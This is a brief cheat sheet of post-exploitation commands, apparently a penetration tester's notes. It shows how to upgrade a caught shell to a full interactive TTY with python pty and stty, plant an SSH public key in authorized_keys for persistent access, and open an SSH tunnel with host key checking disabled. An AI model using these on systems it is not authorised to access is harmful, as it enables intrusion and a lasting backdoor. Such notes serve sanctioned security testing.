$env:Path = 'C:\Windows\System32;C:\Windows\System32\WindowsPowershell\v1.0\;' + $env.Path
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
export TERM=xterm-256color
stty rows 50 columns 236
mkdir .ssh
echo "RSA.PUB" > authorized_keys
chmod 0700 .ssh
chmod 0644 authorized_keys
Ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"